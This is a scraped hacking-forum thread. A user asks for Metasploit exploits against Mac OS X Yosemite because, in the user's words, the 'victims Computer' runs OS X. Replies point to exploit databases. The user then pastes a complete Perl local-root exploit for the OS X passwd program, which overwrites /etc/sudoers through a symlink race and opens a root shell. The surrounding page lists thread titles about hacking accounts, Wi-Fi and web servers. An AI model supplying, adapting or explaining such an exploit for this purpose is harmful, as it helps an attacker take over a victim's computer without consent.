Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
How to Hack an Android Device with Only a Ip Adress
54
Replies
4 hrs ago -
Forum Thread:
Popcorntime Alternative?
4
Replies
1 day ago -
Forum Thread:
How Make a Simple Payload with Kali Linux (Detectable)
2
Replies
5 days ago -
Forum Thread:
Parrot Security Os Problem......
15
Replies
1 wk ago -
Forum Thread:
Hack Instagram Account Using BruteForce
200
Replies
1 wk ago -
Forum Thread:
card number generators...
6
Replies
1 wk ago -
Forum Thread:
How to Hack a Website to Edit It
24
Replies
1 wk ago -
Forum Thread:
Can some help me how to hack into a FB account to that was hacked. Trying to get a friends account back. Cheers.
5
Replies
1 wk ago -
Forum Thread:
How to Hack Wifi Network with CMD
82
Replies
3 wks ago -
How to:
Spoof E-Mail Using SendEmail and Postfix
2
Replies
4 wks ago -
How to:
See How to Write an NTFS Partition of HDD/SDD in Kali LinuX (The Ultimate Guide)
2
Replies
4 wks ago -
Forum Thread:
Eml to PST Conversion
9
Replies
1 mo ago -
Forum Thread:
PST File - Outlook Inbox Repair Tool Can't Repair
4
Replies
1 mo ago -
Metasploit Error:
Handler Failed to Bind
39
Replies
1 mo ago -
Forum Thread:
How to Mr Robot's Password Cracker?
10
Replies
1 mo ago -
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
15
Replies
1 mo ago -
Forum Thread:
12 Ways How to Hack Any Social Network and Protect Yourself 2018
1
Replies
1 mo ago -
Forum Thread:
How to Make a Hacking Tool and What Programming Languages Are Used to Make One?
15
Replies
1 mo ago -
Forum Thread:
Does GSA Email Spider Gives Inaccessible or Hidden Email Addresses and Phone Numbers of Web Sites?
4
Replies
1 mo ago -
Forum Thread:
Whatsapp Hack?
18
Replies
1 mo ago
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To:
Crack Shadow Hashes After Getting Root on a Linux System
-
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How To:
Automate Wi-Fi Hacking with Wifite2
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
How to Hack Wi-Fi:
Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To:
Write an XSS Cookie Stealer in JavaScript to Steal Passwords
-
Hack Like a Pro:
How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite
-
How To:
Use Hash-Identifier to Determine Hash Types for Password Cracking
-
How To:
Bypass File Upload Restrictions on Web Apps to Get a Shell
-
How To:
Use Command Injection to Pop a Reverse Shell on a Web Server
-
How To:
Intercept Images from a Security Camera Using Wireshark
-
BT Recon:
How to Snoop on Bluetooth Devices Using Kali Linux
-
How To:
Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How To:
Find Vulnerable Webcams Across the Globe Using Shodan
-
How To:
Brute-Force Nearly Any Website Login with Hatch
-
How To:
Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To:
Crack SSH Private Key Passwords with John the Ripper
-
How To:
Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To:
Brute-Force FTP Credentials & Get Server Access
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts